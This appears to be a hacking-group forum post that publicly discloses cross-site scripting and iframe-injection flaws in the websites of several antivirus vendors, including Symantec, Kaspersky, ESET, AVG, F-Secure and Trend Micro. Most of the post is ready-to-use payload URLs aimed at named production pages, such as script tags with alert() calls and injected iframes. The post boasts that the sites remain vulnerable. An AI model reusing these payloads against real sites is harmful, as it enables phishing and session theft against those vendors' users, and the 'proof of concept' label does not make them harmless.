Nemesis Our Projects Forums Extra Controls
  RegMe



Vulnerabilities in Websites of 6 Antivirus Vendors enable Phishing Attacks



Symantec vs Kaspersky vs Eset-(Nod32) vs AVG vs F-secure vs Trendmicro

hehe...  I know, someone is bored. We have found several bugs in the past few months, always on the same websites.

So now still vulnerable and people still under threat? no doubt !

Symantec.com  - XSS IE only

Code:
https://www.symantec.com/connect/endpoint-management-virtualization/forums}"><script>alert(String.fromCharCode(88,83,83))</script>?sym="><script>alert(String.fromCharCode(88,83,83))</script>

http://img14.imageshack.us/img14/6118/95016577.jpg

Altris.com  - XSS and Iframe Injection on search module

why altris? look at this
http://img14.imageshack.us/img14/9207/26362020.jpg

Code:
https://kb.altiris.com/display/1n/index.asp?c=&cpc=&cid=&cat=&catURL=&r=0.94508

http://img141.imageshack.us/img141/4982/89773256.jpg

http://img141.imageshack.us/img141/5645/90990231.jpg
:)proof on concept  
Search string
Code:
"<iframe src=http://kaspersky.com'><BR><BR><IFRAME width='100%' height='600px' src='http://kaspersky.com/200'>


WARNING: This is a proof of concept that proves an XSS bug in altiris.com website.


What about this ?
http://img141.imageshack.us/img141/9535/97476447.jpg

Kaspersky - XSS & Iframe Injection

Code:
https://support.kaspersky.com/en/PersonalCabinet3/Registration/Form/?"><script>alert(12157312.477)</script>

http://img19.imageshack.us/img19/6135/60156390.jpg

Code:
http://support.kaspersky.ru/virlab/helpdesk.html?'"></title><script>alert(1337)</script>><marquee><h1>XSS</h1></marquee>

http://img19.imageshack.us/img19/6545/42343404.jpg

Code:
http://support.kaspersky.ru/virlab/helpdesk.html?'"><iframe src=http://support.kaspersky.ru

http://img9.imageshack.us/img9/4616/25204393.gif

Works fine also Redirect to other website

Linkscanner.avg.com - Critical XSS

http://img14.imageshack.us/img14/2204/17343281.jpg

Eset.co.il - Iframe Injection

Code:
http://www.eset.co.il/home/doc.aspx?mCatID=9904&rgid=151&strSearch="<iframe src=http://symantec.com><BR><BR><IFRAME width='100%' height='600px' src='http://symantec.com/200'>

http://img528.imageshack.us/img528/7952/42032489.jpg

F-secure.com - XSS & Iframe Injection by Vektor

Vulnerable Page
Code:
http://www.f-secure.com/en_EMEA/about-us/contact-us/feedback/

http://img18.imageshack.us/img18/651/38893606.jpg
http://img155.imageshack.us/img155/6127/fgoogle.gif

WARNING: This is a proof of concept that proves an XSS bug in f-secure website.


Trendmicro.com - XSS & Iframe Injection

Vulnerable page:
Code:
http://trendmicro.mediaroom.com/index.php?s="><script>alert(String.fromCharCode(88,83,83))</script>

http://img10.imageshack.us/img10/9504/trendp.gif
xss and Iframe injection  on search module
Warning ! This is only a Proof of Concept So We Will Not Be Responsible for Any Damage

Update


Submitted by [-TE-]-Methodman


No Comments


You need to be logged in to be able to post comments